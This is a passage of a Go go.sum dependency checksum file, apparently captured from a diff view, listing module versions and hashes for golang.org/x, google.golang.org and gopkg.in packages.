golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
|
||||
golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
|
||||
golang.org/x/time v0.0.0-20190921001708-c4c64cad1fd0/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
|
||||
golang.org/x/tools v0.0.0-20180221164845-07fd8470d635/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
||||
golang.org/x/time v0.0.0-20191024005414-555d28b269f0/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
|
||||
golang.org/x/tools v0.0.0-20180828015842-6cd1fcedba52/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
||||
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
||||
golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
||||
golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY=
|
||||
golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
|
||||
golang.org/x/tools v0.0.0-20190312151545-0bb0c0a6e846/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
|
||||
golang.org/x/tools v0.0.0-20190312170243-e65039ee4138/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
|
||||
golang.org/x/tools v0.0.0-20190328211700-ab21143f2384/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
|
||||
golang.org/x/tools v0.0.0-20190425150028-36563e24a262/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q=
|
||||
golang.org/x/tools v0.0.0-20190506145303-2d16b83fe98c/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q=
|
||||
golang.org/x/tools v0.0.0-20190907020128-2ca718005c18/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q=
|
||||
golang.org/x/tools v0.0.0-20190606124116-d0a3d012864b/go.mod h1:/rFqwRUd4F7ZHNgwSSTFct+R/Kf4OFW1sUzUTQQTgfc=
|
||||
golang.org/x/tools v0.0.0-20190621195816-6e04913cbbac/go.mod h1:/rFqwRUd4F7ZHNgwSSTFct+R/Kf4OFW1sUzUTQQTgfc=
|
||||
golang.org/x/tools v0.0.0-20190628153133-6cdbf07be9d0/go.mod h1:/rFqwRUd4F7ZHNgwSSTFct+R/Kf4OFW1sUzUTQQTgfc=
|
||||
golang.org/x/tools v0.0.0-20190816200558-6889da9d5479/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20190911174233-4f2ddba30aff/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191012152004-8de300cfc20a/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191113191852-77e3bb0ad9e7/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191115202509-3a792d9c32b2/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191125144606-a911d9008d1f/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191130070609-6e064ea0cf2d/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191216173652-a0e659d51361/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20191227053925-7b8e75db28f4/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200117161641-43d50277825c/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200122220014-bf1340f18c4a/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200204074204-1cc6d1ef6c74/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200207183749-b753a1ba74fa/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200212150539-ea181f53ac56/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200224181240-023911ca70b2/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200227222343-706bc42d1f0d/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200304193943-95d2e580d8eb/go.mod h1:o4KQGtdN14AW+yjsvvwRTJJuXz8XRtIHtEnmAXLyFUw=
|
||||
golang.org/x/tools v0.0.0-20200312045724-11d5b4c81c7d/go.mod h1:o4KQGtdN14AW+yjsvvwRTJJuXz8XRtIHtEnmAXLyFUw=
|
||||
golang.org/x/tools v0.0.0-20200331025713-a30bf2db82d4/go.mod h1:Sl4aGygMT6LrqrWclx+PTx3U+LnKx/seiNR+3G19Ar8=
|
||||
golang.org/x/tools v0.0.0-20200501065659-ab2804fb9c9d/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
|
||||
golang.org/x/tools v0.0.0-20200512131952-2bc93b1c0c88/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
|
||||
golang.org/x/tools v0.0.0-20200515010526-7d3b6ebf133d/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
|
||||
golang.org/x/tools v0.0.0-20200618134242-20370b0cb4b2/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
|
||||
golang.org/x/tools v0.0.0-20200729194436-6467de6f59a7/go.mod h1:njjCfa9FT2d7l9Bc6FUM5FLjQPp3cFF28FI3qnDFljA=
|
||||
golang.org/x/tools v0.0.0-20200804011535-6c149bb5ef0d/go.mod h1:njjCfa9FT2d7l9Bc6FUM5FLjQPp3cFF28FI3qnDFljA=
|
||||
golang.org/x/tools v0.0.0-20200825202427-b303f430e36d/go.mod h1:njjCfa9FT2d7l9Bc6FUM5FLjQPp3cFF28FI3qnDFljA=
|
||||
golang.org/x/tools v0.0.0-20200904185747-39188db58858/go.mod h1:Cj7w3i3Rnn0Xh82ur9kSqwfTHTeVxaDqrfMjpcNT6bE=
|
||||
golang.org/x/tools v0.0.0-20201110124207-079ba7bd75cd/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
|
||||
golang.org/x/tools v0.0.0-20201201161351-ac6f37ff4c2a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
|
||||
golang.org/x/tools v0.0.0-20201208233053-a543418bbed2/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
|
||||
golang.org/x/tools v0.0.0-20210105154028-b0ab187a4818/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
|
||||
golang.org/x/tools v0.0.0-20210108195828-e2f9c7f1fc8e/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
|
||||
golang.org/x/tools v0.1.0/go.mod h1:xkSsbof2nBLbhDlRMhhhyNLN/zl3eTqcnHD5viDpcZ0=
|
||||
golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk=
|
||||
golang.org/x/tools v0.1.6-0.20210726203631-07bc1bf47fb2/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk=
|
||||
golang.org/x/tools v0.1.12 h1:VveCTK38A2rkS8ZqFY25HIDFscX5X9OoEhJd3quQmXU=
|
||||
golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc=
|
||||
golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
google.golang.org/api v0.3.1/go.mod h1:6wY9I6uQWHQ8EM57III9mq/AjF+i8G65rmVagqKMtkk=
|
||||
google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE=
|
||||
google.golang.org/api v0.7.0/go.mod h1:WtwebWUNSVBH/HAw79HIFXZNqEvBhG+Ra+ax0hx3E3M=
|
||||
google.golang.org/api v0.8.0/go.mod h1:o4eAsZoiT+ibD93RtjEohWalFOjRDx6CVaqeizhEnKg=
|
||||
google.golang.org/api v0.9.0/go.mod h1:o4eAsZoiT+ibD93RtjEohWalFOjRDx6CVaqeizhEnKg=
|
||||
google.golang.org/api v0.13.0/go.mod h1:iLdEw5Ide6rF15KTC1Kkl0iskquN2gFfn9o9XIsbkAI=
|
||||
google.golang.org/api v0.14.0/go.mod h1:iLdEw5Ide6rF15KTC1Kkl0iskquN2gFfn9o9XIsbkAI=
|
||||
google.golang.org/api v0.15.0/go.mod h1:iLdEw5Ide6rF15KTC1Kkl0iskquN2gFfn9o9XIsbkAI=
|
||||
google.golang.org/api v0.17.0/go.mod h1:BwFmGc8tA3vsd7r/7kR8DY7iEEGSU04BFxCo5jP/sfE=
|
||||
google.golang.org/api v0.18.0/go.mod h1:BwFmGc8tA3vsd7r/7kR8DY7iEEGSU04BFxCo5jP/sfE=
|
||||
google.golang.org/api v0.19.0/go.mod h1:BwFmGc8tA3vsd7r/7kR8DY7iEEGSU04BFxCo5jP/sfE=
|
||||
google.golang.org/api v0.20.0/go.mod h1:BwFmGc8tA3vsd7r/7kR8DY7iEEGSU04BFxCo5jP/sfE=
|
||||
google.golang.org/api v0.22.0/go.mod h1:BwFmGc8tA3vsd7r/7kR8DY7iEEGSU04BFxCo5jP/sfE=
|
||||
google.golang.org/api v0.24.0/go.mod h1:lIXQywCXRcnZPGlsd8NbLnOjtAoL6em04bJ9+z0MncE=
|
||||
google.golang.org/api v0.28.0/go.mod h1:lIXQywCXRcnZPGlsd8NbLnOjtAoL6em04bJ9+z0MncE=
|
||||
google.golang.org/api v0.29.0/go.mod h1:Lcubydp8VUV7KeIHD9z2Bys/sm/vGKnG1UHuDBSrHWM=
|
||||
google.golang.org/api v0.30.0/go.mod h1:QGmEvQ87FHZNiUVJkT14jQNYJ4ZJjdRF23ZXz5138Fc=
|
||||
google.golang.org/api v0.35.0/go.mod h1:/XrVsuzM0rZmrsbjJutiuftIzeuTQcEeaYcSk/mQ1dg=
|
||||
google.golang.org/api v0.36.0/go.mod h1:+z5ficQTmoYpPn8LCUNVpK5I7hwkpjbcgqA7I34qYtE=
|
||||
google.golang.org/api v0.40.0/go.mod h1:fYKFpnQN0DsDSKRVRcQSDQNtqWPfM9i+zNPxepjRCQ8=
|
||||
google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM=
|
||||
google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4=
|
||||
google.golang.org/appengine v1.5.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4=
|
||||
google.golang.org/appengine v1.6.1/go.mod h1:i06prIuMbXzDqacNJfV5OdTW448YApPu5ww/cMBSeb0=
|
||||
google.golang.org/appengine v1.6.5/go.mod h1:8WjMMxjGQR8xUklV/ARdw2HLXBOI7O7uCIDZVag1xfc=
|
||||
google.golang.org/appengine v1.6.6/go.mod h1:8WjMMxjGQR8xUklV/ARdw2HLXBOI7O7uCIDZVag1xfc=
|
||||
google.golang.org/appengine v1.6.7/go.mod h1:8WjMMxjGQR8xUklV/ARdw2HLXBOI7O7uCIDZVag1xfc=
|
||||
google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc=
|
||||
google.golang.org/genproto v0.0.0-20190307195333-5fe7a883aa19/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE=
|
||||
google.golang.org/genproto v0.0.0-20190418145605-e7d98fc518a7/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE=
|
||||
google.golang.org/genproto v0.0.0-20190425155659-357c62f0e4bb/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE=
|
||||
google.golang.org/genproto v0.0.0-20190502173448-54afdca5d873/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE=
|
||||
google.golang.org/genproto v0.0.0-20190801165951-fa694d86fc64/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc=
|
||||
google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc=
|
||||
google.golang.org/genproto v0.0.0-20190911173649-1774047e7e51/go.mod h1:IbNlFCBrqXvoKpeg0TB2l7cyZUmoaFKYIwrEpbDKLA8=
|
||||
google.golang.org/genproto v0.0.0-20191108220845-16a3f7862a1a/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc=
|
||||
google.golang.org/genproto v0.0.0-20191115194625-c23dd37a84c9/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc=
|
||||
google.golang.org/genproto v0.0.0-20191216164720-4f79533eabd1/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc=
|
||||
google.golang.org/genproto v0.0.0-20191230161307-f3c370f40bfb/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc=
|
||||
google.golang.org/genproto v0.0.0-20200115191322-ca5a22157cba/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc=
|
||||
google.golang.org/genproto v0.0.0-20200122232147-0452cf42e150/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc=
|
||||
google.golang.org/genproto v0.0.0-20200204135345-fa8e72b47b90/go.mod h1:GmwEX6Z4W5gMy59cAlVYjN9JhxgbQH6Gn+gFDQe2lzA=
|
||||
google.golang.org/genproto v0.0.0-20200212174721-66ed5ce911ce/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200224152610-e50cd9704f63/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200228133532-8c2c7df3a383/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200305110556-506484158171/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200312145019-da6875a35672/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200331122359-1ee6d9798940/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200430143042-b979b6f78d84/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200511104702-f5ebc3bea380/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200515170657-fc4c6c6a6587/go.mod h1:YsZOwe1myG/8QRHRsmBRE1LrgQY60beZKjly0O1fX9U=
|
||||
google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo=
|
||||
google.golang.org/genproto v0.0.0-20200618031413-b414f8b61790/go.mod h1:jDfRM7FcilCzHH/e9qn6dsT145K34l5v+OpcnNgKAAA=
|
||||
google.golang.org/genproto v0.0.0-20200729003335-053ba62fc06f/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20200804131852-c06518451d9c/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20200825200019-8632dd797987/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20200904004341-0bd0a958aa1d/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20201109203340-2640f1f9cdfb/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20201201144952-b05cb90ed32e/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20201210142538-e3217bee35cc/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20201214200347-8c77b98c765d/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20210108203827-ffc7fda8c3d7/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20210226172003-ab064af71705/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/grpc v1.17.0/go.mod h1:6QZJwpn2B+Zp71q/5VxRsJ6NXXVCE5NRUHRo+f3cWCs=
|
||||
google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c=
|
||||
google.golang.org/grpc v1.19.1/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c=
|
||||
google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38=
|
||||
google.golang.org/grpc v1.21.0/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM=
|
||||
google.golang.org/grpc v1.21.1/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM=
|
||||
google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg=
|
||||
google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY=
|
||||
google.golang.org/grpc v1.26.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk=
|
||||
google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk=
|
||||
google.golang.org/grpc v1.27.1/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk=
|
||||
google.golang.org/grpc v1.28.0/go.mod h1:rpkK4SK4GF4Ach/+MFLZUBavHOvF2JJB5uozKKal+60=
|
||||
google.golang.org/grpc v1.29.1/go.mod h1:itym6AZVZYACWQqET3MqgPpjcuV5QH3BxFS3IjizoKk=
|
||||
google.golang.org/grpc v1.30.0/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak=
|
||||
google.golang.org/grpc v1.31.0/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak=
|
||||
google.golang.org/grpc v1.31.1/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak=
|
||||
google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc=
|
||||
google.golang.org/grpc v1.34.0/go.mod h1:WotjhfgOW/POjDeRt8vscBtXq+2VjORFy659qA51WJ8=
|
||||
google.golang.org/grpc v1.35.0/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU=
|
||||
google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8=
|
||||
google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0=
|
||||
google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM=
|
||||
google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE=
|
||||
google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo=
|
||||
google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU=
|
||||
google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU=
|
||||
google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU=
|
||||
google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4=
|
||||
google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c=
|
||||
gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw=
|
||||
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
|
||||
gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127 h1:qIbj1fsPNlZgppZ+VLlY7N33q108Sa+fhmuc+sWQYwY=
|
||||
gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
|
||||
gopkg.in/errgo.v2 v2.1.0/go.mod h1:hNsd1EY+bozCKY1Ytp96fpM3vjJbqLJn88ws8XvfDNI=
|
||||
gopkg.in/fsnotify.v1 v1.4.7/go.mod h1:Tz8NjZHkW78fSQdbUxIjBTcgA1z1m8ZHf0WmKUhAMys=
|
||||
gopkg.in/h2non/gock.v1 v1.0.15/go.mod h1:sX4zAkdYX1TRGJ2JY156cFspQn4yRWn6p9EMdODlynE=
|
||||
gopkg.in/ini.v1 v1.42.0/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k=
|
||||
gopkg.in/ini.v1 v1.44.0/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k=
|
||||
gopkg.in/ini.v1 v1.66.4 h1:SsAcf+mM7mRZo2nJNGt8mZCjG8ZRaNGMURJw7BsIST4=
|
||||
gopkg.in/ini.v1 v1.66.4/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k=
|
||||
gopkg.in/ns1/ns1-go.v2 v2.0.0-20190730140822-b51389932cbc/go.mod h1:VV+3haRsgDiVLxyifmMBrBIuCWFBPYKbRssXB9z67Hw=
|
||||
gopkg.in/resty.v1 v1.9.1/go.mod h1:vo52Hzryw9PnPHcJfPsBiFW62XhNx5OczbV9y+IMpgc=
|
||||
gopkg.in/resty.v1 v1.12.0/go.mod h1:mDo4pnntr5jdWRML875a/NmxYqAlA73dVijT2AXvQQo=
|
||||
@ -401,11 +735,22 @@ gopkg.in/square/go-jose.v2 v2.3.1 h1:SK5KegNXmKmqE342YYN2qPHEnUYeoMiXXl1poUlI+o4
|
||||
gopkg.in/square/go-jose.v2 v2.3.1/go.mod h1:M9dMgbHiYLoDGQrXy7OpJDJWiKiU//h+vD76mk0e1AI=
|
||||
gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7/go.mod h1:dt/ZhP58zS4L8KSrWDmTeBkI65Dw0HsyUHuEVlX15mw=
|
||||
gopkg.in/yaml.v2 v2.0.0-20170812160011-eb3733d160e7/go.mod h1:JAlM8MvJe8wmxCU4Bli9HhUf9+ttbYbLASfIpnQbh74=
|
||||
gopkg.in/yaml.v2 v2.2.1 h1:mUhvW9EsL+naU5Q3cakzfE91YhliOondGd6ZrsDBHQE=
|
||||
gopkg.in/yaml.v2 v2.2.1/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
|
||||
gopkg.in/yaml.v2 v2.2.2 h1:ZCJp+EgiOT7lHqUV2J862kp8Qj64Jo6az82+3Td9dZw=
|
||||
gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
|
||||
gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
|
||||
gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY=
|
||||
gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ=
|
||||
gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
|
||||
gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo=
|
||||
gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
|
||||
honnef.co/go/tools v0.0.0-20180728063816-88497007e858/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
|
||||
honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
|
||||
